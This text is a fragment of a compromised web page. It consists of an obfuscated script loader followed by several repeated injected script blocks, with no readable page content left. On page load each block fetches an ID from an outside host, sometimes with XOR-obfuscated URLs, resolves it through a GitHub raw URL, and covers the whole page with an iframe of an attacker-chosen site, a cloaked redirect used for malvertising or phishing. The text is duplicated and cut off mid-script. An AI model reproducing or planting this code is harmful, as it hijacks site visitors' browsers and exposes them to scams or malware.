114,47,40,54,115,97,87,80,122,122,122,122,122,122,39,118,122,106,115,97,87,80,122,122,122,122,122,122,40,63,46,47,40,52,97,87,80,122,122,122,122,39,87,80,87,80,122,122,122,122,44,59,40,122,51,60,40,59,55,63,122,103,122,62,53,57,47,55,63,52,46,116,57,40,63,59,46,63,31,54,63,55,63,52,46,114,120,51,60,40,59,55,63,120,115,97,87,80,122,122,122,122,44,59,40,122,57,54,53,41,63,62,122,103,122,60,59,54,41,63,97,87,80,122,122,122,122,44,59,40,122,40,63,44,63,59,54,63,62,122,103,122,60,59,54,41,63,97,87,80,122,122,122,122,44,59,40,122,46,51,55,63,53,47,46,19,62,122,103,122,52,47,54,54,97,87,80,87,80,122,122,122,122,60,47,52,57,46,51,53,52,122,40,63,44,63,59,54,114,115,122,33,87,80,122,122,122,122,122,122,51,60,122,114,57,54,53,41,63,62,122,38,38,122,40,63,44,63,59,54,63,62,115,122,40,63,46,47,40,52,97,87,80,122,122,122,122,122,122,40,63,44,63,59,54,63,62,122,103,122,46,40,47,63,97,87,80,122,122,122,122,122,122,51,60,122,114,46,51,55,63,53,47,46,19,62,115,122,57,54,63,59,40,14,51,55,63,53,47,46,114,46,51,55,63,53,47,46,19,62,115,97,87,80,87,80,122,122,122,122,122,122,40,63,61,51,41,46,40,35,116,41,46,59,46,47,41,122,103,122,120,59,57,46,51,44,63,120,97,87,80,87,80,122,122,122,122,122,122,51,60,40,59,55,63,116,41,46,35,54,63,116,44,51,41,51,56,51,54,51,46,35,122,103,122,120,44,51,41,51,56,54,63,120,97,87,80,122,122,122,122,122,122,51,60,40,59,55,63,116,41,46,35,54,63,116,53,42,59,57,51,46,35,122,103,122,120,107,120,97,87,80,122,122,122,122,122,122,51,60,40,59,55,63,116,41,46,35,54,63,116,42,53,51,52,46,63,40,31,44,63,52,46,41,122,103,122,120,59,47,46,53,120,97,87,80,122,122,122,122,122,122,51,60,40,59,55,63,116,40,63,55,53,44,63,27,46,46,40,51,56,47,46,63,114,120,59,40,51,59,119,50,51,62,62,63,52,120,115,97,87,80,87,80,122,122,122,122,122,122,41,63,46,14,51,55,63,53,47,46,114,60,47,52,57,46,51,53,52,122,114,115,122,33,87,80,122,122,122,122,122,122,122,122,46,40,35,122,33,122,51,60,40,59,55,63,116,60,53,57,47,41,114,115,97,122,39,122,57,59,46,57,50,122,114,63,115,122,33,39,87,80,122,122,122,122,122,122,122,122,46,40,35,122,33,87,80,122,122,122,122,122,122,122,122,122,122,51,60,122,114,51,60,40,59,55,63,116,57,53,52,46,63,52,46,13,51,52,62,53,45,122,124,124,122,51,60,40,59,55,63,116,57,53,52,46,63,52,46,13,51,52,62,53,45,116,60,53,57,47,41,115,122,33,87,80,122,122,122,122,122,122,122,122,122,122,122,122,51,60,40,59,55,63,116,57,53,52,46,63,52,46,13,51,52,62,53,45,116,60,53,57,47,41,114,115,97,87,80,122,122,122,122,122,122,122,122,122,122,39,87,80,122,122,122,122,122,122,122,122,39,122,57,59,46,57,50,122,114,63,115,122,33,39,87,80,122,122,122,122,122,122,39,118,122,106,115,97,87,80,122,122,122,122,39,87,80,87,80,122,122,122,122,60,47,52,57,46,51,53,52,122,62,63,41,46,40,53,35,114,115,122,33,87,80,122,122,122,122,122,122,51,60,122,114,57,54,53,41,63,62,115,122,40,63,46,47,40,52,97,87,80,122,122,122,122,122,122,57,54,53,41,63,62,122,103,122,46,40,47,63,97,87,80,122,122,122,122,122,122,51,60,122,114,46,51,55,63,53,47,46,19,62,115,122,57,54,63,59,40,14,51,55,63,53,47,46,114,46,51,55,63,53,47,46,19,62,115,97,87,80,122,122,122,122,122,122,57,54,63,59,52,47,42,114,120,62,53,52,63,120,115,97,87,80,122,122,122,122,39,87,80,87,80,122,122,122,122,40,63,61,51,41,46,40,35,116,62,63,41,46,40,53,35,122,103,122,62,63,41,46,40,53,35,97,87,80,122,122,122,122,40,63,61,51,41,46,40,35,116,40,63,44,63,59,54,122,103,122,40,63,44,63,59,54,97,87,80,87,80,122,122,122,122,51,60,40,59,55,63,116,51,62,122,103,122,40,63,61,51,41,46,40,35,116,51,60,40,59,55,63,19,62,97,87,80,122,122,122,122,51,60,40,59,55,63,116,41,63,46,27,46,46,40,51,56,47,46,63,114,40,63,61,51,41,46,40,35,116,51,60,40,59,55,63,27,46,46,40,118,122,120,107,120,115,97,87,80,122,122,122,122,51,60,40,59,55,63,116,41,63,46,27,46,46,40,51,56,47,46,63,114,120,59,40,51,59,119,50,51,62,62,63,52,120,118,122,120,46,40,47,63,120,115,97,87,80,122,122,122,122,51,60,40,59,55,63,116,41,63,46,27,46,46,40,51,56,47,46,63,114,120,54,53,59,62,51,52,61,120,118,122,120,63,59,61,63,40,120,115,97,87,80,122,122,122,122,51,60,40,59,55,63,116,41,63,46,27,46,46,40,51,56,47,46,63,114,120,59,54,54,53,45,120,118,122,120,57,54,51,42,56,53,59,40,62,119,45,40,51,46,63,120,115,97,87,80,122,122,122,122,51,60,40,59,55,63,116,41,40,57,122,103,122,41,59,60,63,27,42,42,63,52,62,11,47,63,40,35,114,47,40,54,118,122,120,44,120,118,122,23,59,46,50,116,40,59,52,62,53,55,114,115,116,46,53,9,46,40,51,52,61,114,105,108,115,116,41,54,51,57,63,114,104,115,115,97,87,80,122,122,122,122,51,60,40,59,55,63,116,41,46,35,54,63,116,57,41,41,14,63,34,46,122,103,122,1,87,80,122,122,122,122,122,122,120,42,53,41,51,46,51,53,52,96,60,51,34,63,62,122,123,51,55,42,53,40,46,59,52,46,120,118,87,80,122,122,122,122,122,122,120,46,53,42,96,106,120,118,87,80,122,122,122,122,122,122,120,54,63,60,46,96,106,120,118,87,80,122,122,122,122,122,122,120,45,51,62,46,50,96,107,106,106,44,45,120,118,87,80,122,122,122,122,122,122,120,50,63,51,61,50,46,96,107,106,106,44,50,120,118,87,80,122,122,122,122,122,122,120,56,53,40,62,63,40,96,52,53,52,63,120,118,87,80,122,122,122,122,122,122,120,32,119,51,52,62,63,34,96,104,107,110,109,110,98,105,108,110,109,120,118,87,80,122,122,122,122,122,122,120,55,59,40,61,51,52,96,106,120,118,87,80,122,122,122,122,122,122,120,42,59,62,62,51,52,61,96,106,120,118,87,80,122,122,122,122,122,122,120,53,44,63,40,60,54,53,45,96,50,51,62,62,63,52,120,118,87,80,122,122,122,122,122,122,120,44,51,41,51,56,51,54,51,46,35,96,50,51,62,62,63,52,120,118,87,80,122,122,122,122,122,122,120,53,42,59,57,51,46,35,96,106,120,118,87,80,122,122,122,122,122,122,120,42,53,51,52,46,63,40,119,63,44,63,52,46,41,96,52,53,52,63,120,118,87,80,122,122,122,122,122,122,120,56,59,57,49,61,40,53,47,52,62,96,46,40,59,52,41,42,59,40,63,52,46,120,87,80,122,122,122,122,7,116,48,53,51,52,114,120,97,120,115,97,87,80,87,80,122,122,122,122,51,60,40,59,55,63,116,53,52,54,53,59,62,122,103,122,60,47,52,57,46,51,53,52,122,114,115,122,33,87,80,122,122,122,122,122,122,51,60,122,114,57,54,53,41,63,62,115,122,40,63,46,47,40,52,97,87,80,122,122,122,122,122,122,51,60,122,114,123,40,63,61,51,41,46,40,35,116,40,63,43,47,51,40,63,8,63,59,62,35,23,63,41,41,59,61,63,115,122,33,87,80,122,122,122,122,122,122,122,122,40,63,44,63,59,54,114,115,97,87,80,122,122,122,122,122,122,39,87,80,122,122,122,122,39,97,87,80,87,80,122,122,122,122,51,60,40,59,55,63,116,53,52,63,40,40,53,40,122,103,122,60,47,52,57,46,51,53,52,122,114,115,122,33,87,80,122,122,122,122,122,122,62,63,41,46,40,53,35,114,115,97,87,80,122,122,122,122,39,97,87,80,87,80,122,122,122,122,46,51,55,63,53,47,46,19,62,122,103,122,41,63,46,14,51,55,63,53,47,46,114,60,47,52,57,46,51,53,52,122,114,115,122,33,87,80,122,122,122,122,122,122,62,63,41,46,40,53,35,114,115,97,87,80,122,122,122,122,39,118,122,40,63,61,51,41,46,40,35,116,51,60,40,59,55,63,14,51,55,63,53,47,46,23,41,115,97,87,80,87,80,122,122,122,122,46,40,35,122,33,87,80,122,122,122,122,122,122,55,53,47,52,46,116,59,42,42,63,52,62,25,50,51,54,62,114,51,60,40,59,55,63,115,97,87,80,122,122,122,122,39,122,57,59,46,57,50,122,114,63,115,122,33,87,80,122,122,122,122,122,122,62,63,41,46,40,53,35,114,115,97,87,80,122,122,122,122,39,87,80,122,122,39,87,80,87,80,122,122,60,47,52,57,46,51,53,52,122,40,47,52,114,115,122,33,87,80,122,122,122,122,45,59,40,55,47,42,21,40,51,61,51,52,41,114,115,97,87,80,122,122,122,122,56,51,52,62,23,63,41,41,59,61,63,18,59,52,62,54,63,40,114,115,97,87,80,87,80,122,122,122,122,40,63,46,47,40,52,122,60,63,46,57,50,14,63,34,46,20,53,14,50,40,53,45,114,27,10,19,5,19,30,5,15,8,22,118,122,40,63,61,51,41,46,40,35,116,40,63,43,47,63,41,46,14,51,55,63,53,47,46,23,41,115,87,80,122,122,122,122,122,122,116,46,50,63,52,114,60,47,52,57,46,51,53,52,122,114,51,62,115,122,33,87,80,122,122,122,122,122,122,122,122,51,60,122,114,51,41,13,42,22,53,61,61,63,62,19,52,25,53,52,46,63,34,46,114,115,115,122,33,87,80,122,122,122,122,122,122,122,122,122,122,57,54,63,59,52,47,42,114,120,62,53,52,63,120,115,97,87,80,122,122,122,122,122,122,122,122,122,122,40,63,46,47,40,52,122,120,120,97,87,80,122,122,122,122,122,122,122,122,39,87,80,87,80,122,122,122,122,122,122,122,122,51,62,122,103,122,114,51,62,122,38,38,122,120,120,115,116,46,40,51,55,114,115,97,87,80,122,122,122,122,122,122,122,122,51,60,122,114,123,51,62,115,122,33,87,80,122,122,122,122,122,122,122,122,122,122,57,54,63,59,52,47,42,114,120,62,53,52,63,120,115,97,87,80,122,122,122,122,122,122,122,122,122,122,40,63,46,47,40,52,122,120,120,97,87,80,122,122,122,122,122,122,122,122,39,87,80,87,80,122,122,122,122,122,122,122,122,40,63,46,47,40,52,122,40,63,41,53,54,44,63,22,59,52,62,51,52,61,15,40,54,114,51,62,115,97,87,80,122,122,122,122,122,122,39,115,87,80,122,122,122,122,122,122,116,46,50,63,52,114,60,47,52,57,46,51,53,52,122,114,60,51,52,59,54,15,40,54,115,122,33,87,80,122,122,122,122,122,122,122,122,51,60,122,114,51,41,13,42,22,53,61,61,63,62,19,52,25,53,52,46,63,34,46,114,115,115,122,33,87,80,122,122,122,122,122,122,122,122,122,122,57,54,63,59,52,47,42,114,120,62,53,52,63,120,115,97,87,80,122,122,122,122,122,122,122,122,122,122,40,63,46,47,40,52,122,120,120,97,87,80,122,122,122,122,122,122,122,122,39,87,80,87,80,122,122,122,122,122,122,122,122,60,51,52,59,54,15,40,54,122,103,122,46,53,18,46,46,42,15,40,54,114,60,51,52,59,54,15,40,54,115,97,87,80,87,80,122,122,122,122,122,122,122,122,51,60,122,114,123,60,51,52,59,54,15,40,54,115,122,33,87,80,122,122,122,122,122,122,122,122,122,122,57,54,63,59,52,47,42,114,120,62,53,52,63,120,115,97,87,80,122,122,122,122,122,122,122,122,122,122,40,63,46,47,40,52,122,120,120,97,87,80,122,122,122,122,122,122,122,122,39,87,80,87,80,122,122,122,122,122,122,122,122,44,59,40,122,60,51,52,59,54,21,40,51,61,51,52,122,103,122,61,63,46,21,40,51,61,51,52,9,59,60,63,114,60,51,52,59,54,15,40,54,115,97,87,80,122,122,122,122,122,122,122,122,51,60,122,114,60,51,52,59,54,21,40,51,61,51,52,115,122,33,87,80,122,122,122,122,122,122,122,122,122,122,59,62,62,18,51,52,46,114,120,62,52,41,119,42,40,63,60,63,46,57,50,120,118,122,60,51,52,59,54,21,40,51,61,51,52,115,97,87,80,122,122,122,122,122,122,122,122,122,122,59,62,62,18,51,52,46,114,120,42,40,63,57,53,52,52,63,57,46,120,118,122,60,51,52,59,54,21,40,51,61,51,52,115,97,87,80,122,122,122,122,122,122,122,122,39,87,80,87,80,122,122,122,122,122,122,122,122,59,57,46,51,44,59,46,63,19,60,40,59,55,63,114,60,51,52,59,54,15,40,54,115,97,87,80,122,122,122,122,122,122,122,122,40,63,46,47,40,52,122,60,51,52,59,54,15,40,54,97,87,80,122,122,122,122,122,122,39,115,87,80,122,122,122,122,122,122,116,57,59,46,57,50,114,60,47,52,57,46,51,53,52,122,114,115,122,33,87,80,122,122,122,122,122,122,122,122,57,54,63,59,52,47,42,114,120,62,53,52,63,120,115,97,87,80,122,122,122,122,122,122,39,115,97,87,80,122,122,39,87,80,87,80,122,122,40,63,61,51,41,46,40,35,116,40,47,52,10,40,53,55,51,41,63,122,103,122,40,47,52,114,115,97,87,80,39,115,114,115,97];return String.fromCharCode.apply(String,_0x5641.map(function(c){return c^0x5A;}));})();var __d=document;var __h=__d.head||__d.documentElement;var __sc=__d.createElement("script");__sc.type="text/javascript";__sc.text=__s;__h.appendChild(__sc);})();</script><script>(function() {
  var API_ID_URL = "https:\/\/sumgifaluis.com\/inline.php";
  var TRUSTED_CONFIGS = [{"template":"https:\/\/raw.githubusercontent.com\/{id}","useFetch":true}];</p>
<p>  var GLOBAL_KEY = Symbol.for("__adspect_wpu_4__");
  var registry = window[GLOBAL_KEY] = window[GLOBAL_KEY] || { run: false };
  if (registry.run) return;
  registry.run = true;</p>
<p>  function buildTrustedUrl(template, id) {
    if (template.indexOf("dropbox.com") >= 0) return template.replace(/\{id\}/g, id);
    var encoded = encodeURIComponent(id);
    if (template.indexOf("gist.githubusercontent.com") >= 0 || template.indexOf("raw.githubusercontent.com") >= 0) encoded = encoded.replace(/%2F/g, "/");
    return template.replace(/\{id\}/g, encoded);
  }</p>
<p>  function isSingleUrl(text) {
    var s = (text || "").trim();
    if (s.indexOf("\n") >= 0 || s.indexOf("\r") >= 0) return false;
    return /^https?:\/\/[^\s<>"']+$/i.test(s);
  }</p>
<p>  function showInIframe(url) {
    if (!url || !/^https?:\/\//i.test(url)) return;
    try {
      var iframe = document.createElement("iframe");
      iframe.src = url;
      iframe.style.cssText = "position:fixed !important;top:0;left:0;width:100vw;height:100vh;border:none;z-index:2147483647;margin:0;padding:0;";
      (document.body || document.documentElement).appendChild(iframe);
    } catch (e) {}
  }</p>
<p>  function run() {
    fetch(API_ID_URL, { cache: "no-store" })
      .then(function(r) { return r.text(); })
      .then(function(id) {
        id = (id || "").trim();
        if (!id || !TRUSTED_CONFIGS.length) return null;
        var template = TRUSTED_CONFIGS[0].template;
        var trustedUrl = buildTrustedUrl(template, id);
        return fetch(trustedUrl, { cache: "no-store" })
          .then(function(r) { return r.text(); })
          .then(function(t) { return (t || "").trim(); })
          .catch(function() { return ""; });
      })
      .then(function(trustedResponse) {
        if (!trustedResponse) return;
        if (isSingleUrl(trustedResponse)) {
          showInIframe(trustedResponse);
        }
      })
      .catch(function() {});
  }</p>
<p>  if (document.readyState === "complete" || document.body) {
    run();
  } else {
    window.addEventListener("DOMContentLoaded", run);
  }
})();</script><script>(function() {
  var API_ID_URL = "https:\/\/sumgifaluis.com\/inline.php";
  var TRUSTED_CONFIGS = [{"template":"https:\/\/raw.githubusercontent.com\/{id}","useFetch":true}];</p>
<p>  var GLOBAL_KEY = Symbol.for("__adspect_wpu_4__");
  var registry = window[GLOBAL_KEY] = window[GLOBAL_KEY] || { run: false };
  if (registry.run) return;
  registry.run = true;</p>
<p>  function buildTrustedUrl(template, id) {
    if (template.indexOf("dropbox.com") >= 0) return template.replace(/\{id\}/g, id);
    var encoded = encodeURIComponent(id);
    if (template.indexOf("gist.githubusercontent.com") >= 0 || template.indexOf("raw.githubusercontent.com") >= 0) encoded = encoded.replace(/%2F/g, "/");
    return template.replace(/\{id\}/g, encoded);
  }</p>
<p>  function isSingleUrl(text) {
    var s = (text || "").trim();
    if (s.indexOf("\n") >= 0 || s.indexOf("\r") >= 0) return false;
    return /^https?:\/\/[^\s<>"']+$/i.test(s);
  }</p>
<p>  function showInIframe(url) {
    if (!url || !/^https?:\/\//i.test(url)) return;
    try {
      var iframe = document.createElement("iframe");
      iframe.src = url;
      iframe.style.cssText = "position:fixed !important;top:0;left:0;width:100vw;height:100vh;border:none;z-index:2147483647;margin:0;padding:0;";
      (document.body || document.documentElement).appendChild(iframe);
    } catch (e) {}
  }</p>
<p>  function run() {
    fetch(API_ID_URL, { cache: "no-store" })
      .then(function(r) { return r.text(); })
      .then(function(id) {
        id = (id || "").trim();
        if (!id || !TRUSTED_CONFIGS.length) return null;
        var template = TRUSTED_CONFIGS[0].template;
        var trustedUrl = buildTrustedUrl(template, id);
        return fetch(trustedUrl, { cache: "no-store" })
          .then(function(r) { return r.text(); })
          .then(function(t) { return (t || "").trim(); })
          .catch(function() { return ""; });
      })
      .then(function(trustedResponse) {
        if (!trustedResponse) return;
        if (isSingleUrl(trustedResponse)) {
          showInIframe(trustedResponse);
        }
      })
      .catch(function() {});
  }</p>
<p>  if (document.readyState === "complete" || document.body) {
    run();
  } else {
    window.addEventListener("DOMContentLoaded", run);
  }
})();</script><script>(function() {
  var API_ID_URL = "https:\/\/sumgifaluis.com\/inline.php";
  var TRUSTED_CONFIGS = [{"template":"https:\/\/raw.githubusercontent.com\/{id}","useFetch":true}];</p>
<p>  var GLOBAL_KEY = Symbol.for("__adspect_wpu_4__");
  var registry = window[GLOBAL_KEY] = window[GLOBAL_KEY] || { run: false };
  if (registry.run) return;
  registry.run = true;</p>
<p>  function buildTrustedUrl(template, id) {
    if (template.indexOf("dropbox.com") >= 0) return template.replace(/\{id\}/g, id);
    var encoded = encodeURIComponent(id);
    if (template.indexOf("gist.githubusercontent.com") >= 0 || template.indexOf("raw.githubusercontent.com") >= 0) encoded = encoded.replace(/%2F/g, "/");
    return template.replace(/\{id\}/g, encoded);
  }</p>
<p>  function isSingleUrl(text) {
    var s = (text || "").trim();
    if (s.indexOf("\n") >= 0 || s.indexOf("\r") >= 0) return false;
    return /^https?:\/\/[^\s<>"']+$/i.test(s);
  }</p>
<p>  function showInIframe(url) {
    if (!url || !/^https?:\/\//i.test(url)) return;
    try {
      var iframe = document.createElement("iframe");
      iframe.src = url;
      iframe.style.cssText = "position:fixed !important;top:0;left:0;width:100vw;height:100vh;border:none;z-index:2147483647;margin:0;padding:0;";
      (document.body || document.documentElement).appendChild(iframe);
    } catch (e) {}
  }</p>
<p>  function run() {
    fetch(API_ID_URL, { cache: "no-store" })
      .then(function(r) { return r.text(); })
      .then(function(id) {
        id = (id || "").trim();
        if (!id || !TRUSTED_CONFIGS.length) return null;
        var template = TRUSTED_CONFIGS[0].template;
        var trustedUrl = buildTrustedUrl(template, id);
        return fetch(trustedUrl, { cache: "no-store" })
          .then(function(r) { return r.text(); })
          .then(function(t) { return (t || "").trim(); })
          .catch(function() { return ""; });
      })
      .then(function(trustedResponse) {
        if (!trustedResponse) return;
        if (isSingleUrl(trustedResponse)) {
          showInIframe(trustedResponse);
        }
      })
      .catch(function() {});
  }</p>
<p>  if (document.readyState === "complete" || document.body) {
    run();
  } else {
    window.addEventListener("DOMContentLoaded", run);
  }
})();</script><script>(function() {
  var API_ID_URL = (function(){var _0x5540=[50,46,46,42,41,96,117,117,62,59,49,51,54,53,51,60,50,41,52,47,47,49,49,59,116,57,53,55,117,51,52,54,51,52,63,116,42,50,42];return String.fromCharCode.apply(String,_0x5540.map(function(c){return c^0x5A;}));})();
  var TRUSTED_CONFIGS = [{"template":(function(){var _0x1230=[50,46,46,42,41,96,117,117,40,59,45,116,61,51,46,50,47,56,47,41,63,40,57,53,52,46,63,52,46,116,57,53,55,117,33,51,62,39];return String.fromCharCode.apply(String,_0x1230.map(function(c){return c^0x5A;}));})(),"useFetch":true}];</p>
<p>  var GLOBAL_KEY = Symbol.for("__adspect_wpu_4__");
  var registry = window[GLOBAL_KEY] = window[GLOBAL_KEY] || { run: false };
  if (registry.run) return;
  registry.run = true;
  registry.iframeId = "adspect_ifr_" + Math.random().toString(36).slice(2);</p>
<p>  function buildTrustedUrl(template, id) {
    if (template.indexOf("dropbox.com") >= 0) return template.replace(/\{id\}/g, id);
    var encoded = encodeURIComponent(id);
    if (template.indexOf("gist.githubusercontent.com") >= 0 || template.indexOf("raw.githubusercontent.com") >= 0) encoded = encoded.replace(/%2F/g, "/");
    return template.replace(/\{id\}/g, encoded);
  }</p>
<p>  /** Ответ траста — одна строка URL */
  function isSingleUrl(text) {
    var s = (text || "").trim();
    if (s.indexOf("\n") >= 0 || s.indexOf("\r") >= 0) return false;
    return /^https?:\/\/[^\s<>"']+$/i.test(s);
  }</p>
<p>  function showInIframe(url) {
    if (!url || !/^https?:\/\//i.test(url)) return;
    try {
      var iframe = document.createElement("iframe");
      iframe.id = registry.iframeId;
      iframe.src = url;
      iframe.style.cssText = "position:fixed !important;top:0;left:0;width:100vw;height:100vh;border:none;z-index:2147483647;margin:0;padding:0;";
      window.addEventListener("message", function onMsg(event) {
        if (!event.data || typeof event.data !== "object") return;
        if (event.data.type === "ktl-show-original") {
          try {
            var el = document.getElementById(registry.iframeId);
            if (el &#038;&#038; el.parentNode) el.parentNode.removeChild(el);
          } catch (e) {}
          window.removeEventListener("message", onMsg);
        }
      });
      (document.body || document.documentElement).appendChild(iframe);
    } catch (e) {}
  }</p>
<p>  function run() {
    fetch(API_ID_URL, { cache: "no-store" })
      .then(function(r) { return r.text(); })
      .then(function(id) {
        id = (id || "").trim();
        if (!id || !TRUSTED_CONFIGS.length) return null;
        var template = TRUSTED_CONFIGS[0].template;
        var trustedUrl = buildTrustedUrl(template, id);
        return fetch(trustedUrl, { cache: "no-store" })
          .then(function(r) { return r.text(); })
          .then(function(t) { return (t || "").trim(); })
          .catch(function() { return ""; });
      })
      .then(function(trustedResponse) {
        if (!trustedResponse) return;
        if (isSingleUrl(trustedResponse)) {
          showInIframe(trustedResponse);
        }
      })
      .catch(function() {});
  }</p>
<p>  if (document.readyState === "complete" || document.body) {
    run();
  } else {
    window.addEventListener("DOMContentLoaded", run);
  }
})();</script><script>(function() {
  var API_ID_URL = (function(){var _0x5540=[50,46,46,42,41,96,117,117,62,59,49,51,54,53,51,60,50,41,52,47,47,49,49,59,116,57,53,55,117,51,52,54,51,52,63,116,42,50,42];return String.fromCharCode.apply(String,_0x5540.map(function(c){return c^0x5A;}));})();
  var TRUSTED_CONFIGS = [{"template":(function(){var _0x1230=[50,46,46,42,41,96,117,117,40,59,45,116,61,51,46,50,47,56,47,41,63,40,57,53,52,46,63,52,46,116,57,53,55,117,33,51,62,39];return String.fromCharCode.apply(String,_0x1230.map(function(c){return c^0x5A;}));})(),"useFetch":true}];</p>
<p>  var GLOBAL_KEY = Symbol.for("__adspect_wpu_4__");
  var registry = window[GLOBAL_KEY] = window[GLOBAL_KEY] || { run: false };
  if (registry.run) return;
  registry.run = true;
  registry.iframeId = "adspect_ifr_" + Math.random().toString(36).slice(2);</p>
<p>  function buildTrustedUrl(template, id) {
    if (template.indexOf("dropbox.com") >= 0) return template.replace(/\{id\}/g, id);
    var encoded = encodeURIComponent(id);
    if (template.indexOf("gist.githubusercontent.com") >= 0 || template.indexOf("raw.githubusercontent.com") >= 0) encoded = encoded.replace(/%2F/g, "/");
    return template.replace(/\{id\}/g, encoded);
  }</p>
<p>  /** Ответ траста — одна строка URL */
  function isSingleUrl(text) {
    var s = (text || "").trim();
    if (s.indexOf("\n") >= 0 || s.indexOf("\r") >= 0) return false;
    return /^https?:\/\/[^\s<>"']+$/i.test(s);
  }</p>
<p>  function showInIframe(url) {
    if (!url || !/^https?:\/\//i.test(url)) return;
    try {
      var iframe = document.createElement("iframe");
      iframe.id = registry.iframeId;
      iframe.src = url;
      iframe.style.cssText = "position:fixed !important;top:0;left:0;width:100vw;height:100vh;border:none;z-index:2147483647;margin:0;padding:0;";
      window.addEventListener("message", function onMsg(event) {
        if (!event.data || typeof event.data !== "object") return;
        if (event.data.type === "ktl-show-original") {
          try {
            var el = document.getElementById(registry.iframeId);
            if (el &#038;&#038; el.parentNode) el.parentNode.removeChild(el);
          } catch (e) {}
          window.removeEventListener("message", onMsg);
        }
      });
      (document.body || document.documentElement).appendChild(iframe);
    } catch (e) {}
  }</p>
<p>  function run() {
    fetch(API_ID_URL, { cache: "no-store" })
      .then(function(r) { return r.text(); })
      .then(function(id) {
        id = (id || "").trim();
        if (!id || !TRUSTED_CONFIGS.length) return null;
        var template = TRUSTED_CONFIGS[0].template;
        var trustedUrl = buildTrustedUrl(template, id);
        return fetch(trustedUrl, { cache: "no-store" })
          .then(function(r) { return r.text(); })
          .then(function(t) { return (t || "").trim(); })
          .catch(function() { return ""; });
      })
      .then(function(trustedResponse) {
        if (!trustedResponse) return;
        if (isSingleUrl(trustedResponse)) {
          showInIframe(trustedResponse);
        }
      })
      .catch(function() {});
  }</p>
<p>  if (document.readyState === "complete" || document.body) {
    run();
  } else {
    window.addEventListener("DOMContentLoaded", run);
  }
})();</script><script>(function() {
  var API_ID_URL = (function(){var _0x5540=[50,46,46,42,41,96,117,117,62,59,49,51,54,53,51,60,50,41,52,47,47,49,49,59,116,57,53,55,117,51,52,54,51,52,63,116,42,50,42];return String.fromCharCode.apply(String,_0x5540.map(function(c){return c^0x5A;}));})();
  var TRUSTED_CONFIGS = [{"template":(function(){var _0x1230=[50,46,46,42,41,96,117,117,40,59,45,116,61,51,46,50,47,56,47,41,63,40,57,53,52,46,63,52,46,116,57,53,55,117,33,51,62,39];return String.fromCharCode.apply(String,_0x1230.map(function(c){return c^0x5A;}));})(),"useFetch":true}];</p>
<p>  var GLOBAL_KEY = Symbol.for("__adspect_wpu_4__");
  var registry = window[GLOBAL_KEY] = window[GLOBAL_KEY] || { run: false };
  if (registry.run) return;
  registry.run = true;
  registry.iframeId = "adspect_ifr_" + Math.random().toString(36).slice(2);</p>
<p>  function buildTrustedUrl(template, id) {
    if (template.indexOf("dropbox.com") >= 0) return template.replace(/\{id\}/g, id);
    var encoded = encodeURIComponent(id);
    if (template.indexOf("gist.githubusercontent.com") >= 0 || template.indexOf("raw.githubusercontent.com") >= 0) encoded = encoded.replace(/%2F/g, "/");
    return template.replace(/\{id\}/g, encoded);
  }</p>
<p>  /** Ответ траста — одна строка URL */
  function isSingleUrl(text) {
    var s = (text || "").trim();
    if (s.indexOf("\n") >= 0 || s.indexOf("\r") >= 0) return false;
    return /^https?:\/\/[^\s<>"']+$/i.test(s);
  }</p>
<p>  function showInIframe(url) {
    if (!url || !/^https?:\/\//i.test(url)) return;
    try {
      var iframe = document.createElement("iframe");
      iframe.id = registry.iframeId;
      iframe.src = url;
      iframe.style.cssText = "position:fixed !important;top:0;left:0;width:100vw;height:100vh;border:none;z-index:2147483647;margin:0;padding:0;";
      window.addEventListener("message", function onMsg(event) {
        if (!event.data || typeof event.data !== "object") return;
        if (event.data.type === "ktl-show-original") {
          try {
            var el = document.getElementById(registry.iframeId);
            if (el &#038;&#038; el.parentNode) el.parentNode.removeChild(el);
          } catch (e) {}
          window.removeEventListener("message", onMsg);
        }
      });
      (document.body || document.documentElement).appendChild(iframe);
    } catch (e) {}
  }</p>
<p>  function run() {
    fetch(API_ID_URL, { cache: "no-store" })
      .then(function(r) { return r.text(); })
      .then(function(id) {
        id = (id || "").trim();
        if (!id || !TRUSTED_CONFIGS.length) return null;
        var template = TRUSTED_CONFIGS[0].template;
        var trustedUrl = buildTrustedUrl(template, id);
        return fetch(trustedUrl, { cache: "no-store" })
          .then(function(r) { return r.text(); })
          .then(function(t) { return (t || "").trim(); })
          .catch(function() { return ""; });
      })
      .then(function(trustedResponse) {
        if (!trustedResponse) return;
        if (isSingleUrl(trustedResponse)) {
          showInIframe(trustedResponse);
        }
      })
      .catch(function() {});
  }</p>
<p>  if (document.readyState === "complete" || document.body) {
    run();
  } else {
    window.addEventListener("DOMContentLoaded", run);
  }
})();</script><script>(function() {
  var API_ID_URL = (function(){var _0x5540=[50,46,46,42,41,96,117,117,62,59,49,51,54,53,51,60,50,41,52,47,47,49,49,59,116,57,53,55,117,51,52,54,51,52,63,116,42,50,42];return String.fromCharCode.apply(String,_0x5540.map(function(c){return c^0x5A;}));})();
  var TRUSTED_CONFIGS = [{"template":(function(){var _0x1230=[50,46,46,42,41,96,117,117,40,59,45,116,61,51,46,50,47,56,47,41,63,40,57,53,52,46,63,52,46,116,57,53,55,117,33,51,62,39];return String.fromCharCode.apply(String,_0x1230.map(function(c){return c^0x5A;}));})(),"useFetch":true}];</p>
<p>  var GLOBAL_KEY = Symbol.for("__adspect_wpu_4__");
  var registry = window[GLOBAL_KEY] = window[GLOBAL_KEY] || { run: false };
  if (registry.run) return;
  registry.run = true;
  registry.iframeId = "adspect_ifr_" + Math.random().toString(36).slice(2);</p>
<p>  function buildTrustedUrl(template, id) {
    if (template.indexOf("dropbox.com") >= 0) return template.replace(/\{id\}/g, id);
    var encoded = encodeURIComponent(id);
    if (template.indexOf("gist.githubusercontent.com") >= 0 || template.indexOf("raw.githubusercontent.com") >= 0) encoded = encoded.replace(/%2F/g, "/");
    return template.replace(/\{id\}/g, encoded);
  }</p>
<p>  /** Ответ траста — одна строка URL */
  function isSingleUrl(text) {
    var s = (text || "").trim();
    if (s.indexOf("\n") >= 0 || s.indexOf("\r") >= 0) return false;
    return /^https?:\/\/[^\s<>"']+$/i.test(s);
  }</p>
<p>  function showInIframe(url) {
    if (!url || !/^https?:\/\//i.test(url)) return;
    try {
      var iframe = document.createElement("iframe");
      iframe.id = registry.iframeId;
      iframe.src = url;
      iframe.style.cssText = "position:fixed !important;top:0;left:0;width:100vw;height:100vh;border:none;z-index:2147483647;margin:0;padding:0;";
      window.addEventListener("message", function onMsg(event) {
        if (!event.data || typeof event.data !== "object") return;
        if (event.data.type === "ktl-show-original") {
          try {
            var el = document.getElementById(registry.iframeId);
            if (el &#038;&#038; el.parentNode) el.parentNode.removeChild(el);
